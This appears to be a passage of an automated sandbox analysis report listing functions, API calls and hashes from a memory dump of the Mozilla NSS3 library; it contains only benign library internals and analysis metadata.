SECITEM_CopyItem_Util.NSS3(00000000,00000000,6C7DCBEA,00000000,00000000), ref: 6C772783
CERT_CopyName.NSS3(00000000,0000000C,6C7DCC4A,?,?,?,00000000,00000000), ref: 6C77279F
SECITEM_CopyItem_Util.NSS3(00000000,00000014,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7727BA
PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000), ref: 6C7727D2

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CopyUtil$Item_$Alloc_ArenaErrorNameValue
String ID:
API String ID: 325484714-0
Opcode ID: 0fc6037d220975863a667b8beee6feb332bc23505dc64b7418f85d60b42de3f2
Instruction ID: 44db7706ba18523473021eea1fd8764763af6590f5f694058c9299b8517ad103
Opcode Fuzzy Hash: 0fc6037d220975863a667b8beee6feb332bc23505dc64b7418f85d60b42de3f2
Instruction Fuzzy Hash: 471148A6A00309AFE7109A329E88F97735CDFD425CF044239EE1987A02FB34E55882B1

Function 6C79CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C7B1E10: TlsGetValue.KERNEL32 ref: 6C7B1E36
Part of subcall function 6C7B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C78B1EE,2404110F,?,?), ref: 6C7B1E4B
Part of subcall function 6C7B1E10: PR_Unlock.NSS3 ref: 6C7B1E76

free.MOZGLUE(?,6C79D079,00000000,00000001), ref: 6C79CDA5
PK11_FreeSymKey.NSS3(?,6C79D079,00000000,00000001), ref: 6C79CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C79D079,00000000,00000001), ref: 6C79CDCF
DeleteCriticalSection.KERNEL32(?,6C79D079,00000000,00000001), ref: 6C79CDE2
free.MOZGLUE(?), ref: 6C79CDE9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: df330a5214dd9de1377e537f1438d28ea3609cf9d6ea71b2279b14f3fc0f5027
Instruction ID: bbc92ee1e613d4dd667bfbc419ee33e065efaa3d2c087ce8bc6c9813d87eacdb
Opcode Fuzzy Hash: df330a5214dd9de1377e537f1438d28ea3609cf9d6ea71b2279b14f3fc0f5027
Instruction Fuzzy Hash: D811A0B2B01111BBDE00AFA6EE4A996B72CBB0426E7140131E90997E12E732E524C7E1

Function 6C802CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802CEC

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C802D02
PR_EnterMonitor.NSS3(?), ref: 6C802D1F
PR_ExitMonitor.NSS3(?), ref: 6C802D42
PR_ExitMonitor.NSS3(?), ref: 6C802D5B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: b6c607bbba8aaafd5e1693985b6cc2ff6dad2d658c66d68afd8775c86833708b
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 0601C4B2B002046BE7309E29FD84BC7B7A5EF45319F005D35E85D86B20E676F819C792

Function 6C802D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802D9C

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C802DB2
PR_EnterMonitor.NSS3(?), ref: 6C802DCF
PR_ExitMonitor.NSS3(?), ref: 6C802DF2
PR_ExitMonitor.NSS3(?), ref: 6C802E0B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: c3b3bd7b89dcccfcaea4da1afae2022171ddbfd1397405df3118eae98dd2a4c3
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 5101C4B1B40204AFEB709E29FE45BC7B7A5EF41318F001D35E85D86B21D636F825C6A2

Function 6C79AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C783090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C79AE42), ref: 6C7830AA
Part of subcall function 6C783090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7830C7
Part of subcall function 6C783090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7830E5
Part of subcall function 6C783090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C783116
Part of subcall function 6C783090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78312B
Part of subcall function 6C783090: PK11_DestroyObject.NSS3(?,?), ref: 6C783154
Part of subcall function 6C783090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7799FF,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C79AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7799FF,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C79AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C79AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C79AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?), ref: 6C79AEA3

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 537c58f296b11bdc250821259f5476fa67cee1e05161aa36e6c01e486e8f9be3
Instruction ID: 97eb7aa637d3059501de1e285e8f00009791954fff0f4a6bad9710d36e5ccbcf
Opcode Fuzzy Hash: 537c58f296b11bdc250821259f5476fa67cee1e05161aa36e6c01e486e8f9be3
Instruction Fuzzy Hash: EC01A466F065105BE701A26CBE9FAAF315C8B8766DF080031E909D7B01F615D90542E3

Function 6C88ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C88A6D8), ref: 6C88AE0D
free.MOZGLUE(?), ref: 6C88AE14
DeleteCriticalSection.KERNEL32(6C88A6D8), ref: 6C88AE36
free.MOZGLUE(?), ref: 6C88AE3D
free.MOZGLUE(00000000,00000000,?,?,6C88A6D8), ref: 6C88AE47

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: a222ef9d118d8f3248e84cc0865f027490d2d4004a60f405eeec9f25a86da133
Instruction ID: a86d9bbf5da0ece2773cd7fb5bc97cf6fee9b240e77b4f1554f81354f60a59d7
Opcode Fuzzy Hash: a222ef9d118d8f3248e84cc0865f027490d2d4004a60f405eeec9f25a86da133
Instruction Fuzzy Hash: 0BF096B5202A01A7CA209FA9D80C9577778BF867797140738F52A83D81D732E216C7D5

Function 6C706C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C706D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C706D20
database corruption, xrefs: 6C706D2A
%s at line %d of [%.10s], xrefs: 6C706D2F

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 70b0bc8fe8e60c83bcb05cf818194944171cb1d365ed477bdccdf25cc2656730
Instruction ID: ff32eb4a1e2327ede9b31c73ce4a16f71c40f7833a36715ba4bd5d23c4400f42
Opcode Fuzzy Hash: 70b0bc8fe8e60c83bcb05cf818194944171cb1d365ed477bdccdf25cc2656730
Instruction Fuzzy Hash: D02102B07003059BCB10CE19CA52B5AB7F2AF81308F144928DC59DBF51E370FA85C792

Function 6C83CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C83CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C83CC7B), ref: 6C83CD7A
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C83CD8E
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C83CDA5
Part of subcall function 6C83CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C83CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C83CCB5
memcpy.VCRUNTIME140(6C8D14F4,6C8D02AC,00000090), ref: 6C83CCD3
memcpy.VCRUNTIME140(6C8D1588,6C8D02AC,00000090), ref: 6C83CD2B

Part of subcall function 6C759AC0: socket.WSOCK32(?,00000017,6C7599BE), ref: 6C759AE6
Part of subcall function 6C759AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C7599BE), ref: 6C759AFC

Part of subcall function 6C760590: closesocket.WSOCK32(6C759A8F,?,?,6C759A8F,00000000), ref: 6C760597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C83CCB0

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: a74915ff465cb073602e36d3e24d40bb6ae3f6bac3e489a22664f6880c22f140
Instruction ID: 3373a76c898eaaa32c8a691d185cecb738b2f8ce79660ac433d3b4821c445212
Opcode Fuzzy Hash: a74915ff465cb073602e36d3e24d40bb6ae3f6bac3e489a22664f6880c22f140
Instruction Fuzzy Hash: DC11B7F5B112505EDB309F999A067423AB99B4633CF502939E4068BF42E738E408CBD5

Function 6C7A2520 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetFunctionList), ref: 6C7A2538
PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6C7A2551

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

Strings

ppFunctionList = 0x%p, xrefs: 6C7A254C
C_GetFunctionList, xrefs: 6C7A2533

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: ppFunctionList = 0x%p$C_GetFunctionList
API String ID: 1907330108-525396629
Opcode ID: a1842b9aa76662285c2f65ab3118d32099d5b682288c198948a1b4f4a051501c
Instruction ID: c45406ab54e33512d25283d63c683e47c7ca6333d30903a1fc00517d6af745aa
Opcode Fuzzy Hash: a1842b9aa76662285c2f65ab3118d32099d5b682288c198948a1b4f4a051501c
Instruction Fuzzy Hash: 3E01C0742021409FDB209B99DA4CB5537B0F78232EF144575E40992A11DB38BC4ACBD2

Function 6C7C46D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C7B7A4F,?), ref: 6C7C46F6
EnterCriticalSection.KERNEL32(?,?,?,6C7B7A4F,?), ref: 6C7C470B
PR_Unlock.NSS3(?,?,?,?,6C7B7A4F,?), ref: 6C7C4720

Strings

Oz{l, xrefs: 6C7C46D9

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue
String ID: Oz{l
API String ID: 1419708843-865793983
Opcode ID: fa93430d183f680c5fe7ee5e0a8ea506c49aa97854bd64917d8732db8307a538
Instruction ID: 13f49c49da4c52b17af253adea2a6a7a71b9978b7197fad6764512ffa53fb2f6
Opcode Fuzzy Hash: fa93430d183f680c5fe7ee5e0a8ea506c49aa97854bd64917d8732db8307a538
Instruction Fuzzy Hash: 4C018CB5A046069FDB10AF39D58856ABBF4FF0635DF014979DC8887A01E730A8A4CFD2

Function 6C7B0630 Relevance: 6.1, APIs: 4, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C7B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C7B195C
Part of subcall function 6C7B1940: EnterCriticalSection.KERNEL32(?,?,6C7B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C78EAC5,00000001), ref: 6C7B1970
Part of subcall function 6C7B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C78EAC5,00000001,?,6C78CE9B,00000001,6C78EAC5), ref: 6C7B19A0

PORT_Alloc_Util.NSS3(00000000,?,?,?,?,?,?,00000000,?,00000009), ref: 6C7B0678

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000009), ref: 6C7B06E6
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C7B0770

Part of subcall function 6C7B1EA0: PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&{l,6C796295,?,00000000,?,00000001,S&{l,?), ref: 6C7B1ECB

free.MOZGLUE(?), ref: 6C7B0787

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Error$Value$Alloc_CriticalEnterSectionUnlockUtilfreemalloc
String ID:
API String ID: 1159529522-0
Opcode ID: d6d18596d72d6fafce8f5da499193d9b8570c73a93b512b6ef4f39fdbc8bd807
Instruction ID: c5d0e9c5872878171e274aa15b9d701dbf29d325f91380a348e83ec42059bf8c
Opcode Fuzzy Hash: d6d18596d72d6fafce8f5da499193d9b8570c73a93b512b6ef4f39fdbc8bd807
Instruction Fuzzy Hash: FD4125F5D002456BDB10DF689E88EAF7B68AF85358F140538E919B7701EA31E914CBE0

Function 6C888530 Relevance: 6.1, APIs: 4, Instructions: 127threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D14E4,6C83CC70), ref: 6C888569
gethostbyaddr.WSOCK32(?,00000004,00000002), ref: 6C8885AD
GetLastError.KERNEL32(?,00000004,00000002), ref: 6C8885B6
PR_GetCurrentThread.NSS3(?,00000004,00000002), ref: 6C8885C6

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CallCurrentErrorLastModuleOncePageSizeThreadgethostbyaddr
String ID:
API String ID: 4254312643-0
Opcode ID: 6c00c40c43ffcaa2a4a9cf95f95263098283c8a987f232c73c1cb7e76f3cbb8d
Instruction ID: 7e834f0ae85cdfab666a1ca1ee84f4bdd143eaff138e8ffba15b376711ac6ff0
Opcode Fuzzy Hash: 6c00c40c43ffcaa2a4a9cf95f95263098283c8a987f232c73c1cb7e76f3cbb8d
Instruction Fuzzy Hash: B141F5B0A0A316ABE7308B35DA54755B7B5AB4532CF084B2BC81643EC1D7749D84CBC1

Function 6C834FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C7185D2,00000000,?,?), ref: 6C834FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C83500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8350C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8350D6

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 0d728c6dbbb3f0776263ac2111d1ba00709ef17bca3d9bdde1ccf9011ae32fcb
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
